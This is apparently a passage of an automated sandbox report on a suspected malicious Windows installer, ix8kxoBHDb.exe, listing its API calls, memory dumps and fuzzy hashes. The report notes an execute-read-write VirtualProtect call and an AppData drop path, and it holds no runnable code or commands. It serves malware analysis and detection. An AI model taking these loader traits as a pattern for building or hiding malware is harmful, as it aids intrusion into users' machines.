                                                  • VirtualProtect.KERNELBASE(73B0505C,00000004,00000040,73B0504C), ref: 73B029B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true
                                                  • Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: f4b2d827fd437fd3b0a38c4d3cdf230342a6fe5f054660b2e062a59b43d6057d
                                                  • Instruction ID: d94af527c41309f103985cbd12a60e5c8209d7c7a06c29e075fd01dddea6e0ac
                                                  • Opcode Fuzzy Hash: f4b2d827fd437fd3b0a38c4d3cdf230342a6fe5f054660b2e062a59b43d6057d
                                                  • Instruction Fuzzy Hash: 80F07FF2509280DED360EB2A878470E3FE4B728209B24A56BA19CDBE41F33454448F95
                                                  APIs
                                                  • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID:
                                                  • API String ID: 1096422788-0
                                                  • Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                  • Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
                                                  • Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                  • Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004062E3,?,00000000,?,?,Call,?), ref: 00406279
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                  • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                  • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                  • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                  APIs
                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: a6d18c98ee21f5be52796325d469c1a2d185cd06dd69ecfff736ff996b69b5af
                                                  • Instruction ID: 5499d889e10e12284ba9d0e0803ee079e3e67a5a0dd97beb148b5d1e1bc1fcbb
                                                  • Opcode Fuzzy Hash: a6d18c98ee21f5be52796325d469c1a2d185cd06dd69ecfff736ff996b69b5af
                                                  • Instruction Fuzzy Hash: E7D01232B04100D7DB10DBA4AF4899D73A49B44369B304677E502F11D0D6B9D9519A2D
                                                  APIs
                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
                                                  • Instruction ID: f8057fa4cd378f1a8adf26ed8b17c038a4feeda265d9f6fa174188bdeaa95141
                                                  • Opcode Fuzzy Hash: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
                                                  • Instruction Fuzzy Hash: 1FC04C71780200BADA208BA49D85F0677545790700F1495797640E50E4C674D460D66C
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                  • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                  • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                  • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                  APIs
                                                  • ShellExecuteExW.SHELL32(?), ref: 00405A23
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID:
                                                  • API String ID: 587946157-0
                                                  • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                  • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                  • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                  • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                  APIs
                                                  • SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                  • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                  • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                  • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00404158), ref: 0040438B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
                                                  • Instruction ID: bc9b5adeae0d36b04141253452f110da710a6babf688c590b829c7787f218d6b
                                                  • Opcode Fuzzy Hash: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
                                                  • Instruction Fuzzy Hash: 34A002B65445009BCE119F50DF05805BA71F7E47417518479A155510348A354561EB19
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                  • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                  • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                  • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                  • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                  • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                  • GlobalFree.KERNEL32(?), ref: 004051FC
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                  • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                  • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                  • ShowWindow.USER32(00000000), ref: 004053AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 1638840714-813528018
                                                  • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                  • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                  • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                  • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                  • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                  • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                  • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                    • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                    • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00403480,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                    • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                    • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00403480,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                    • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00403480,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                  • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                    • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                    • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                    • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: (7B$A$C:\Users\user\AppData\Roaming\brugser\brugo$Call$tH
                                                  • API String ID: 2624150263-2701920035
                                                  • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                  • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                  • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                  • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                  • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                  • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                  • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                  • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                  • GetSysColor.USER32(?), ref: 004045FE
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                  • lstrlenW.KERNEL32(?), ref: 0040461F
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                  • SendMessageW.USER32(00000000), ref: 004046A1
                                                  • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                  • SetCursor.USER32(00000000), ref: 00404720
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                  • SetCursor.USER32(00000000), ref: 0040473C
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
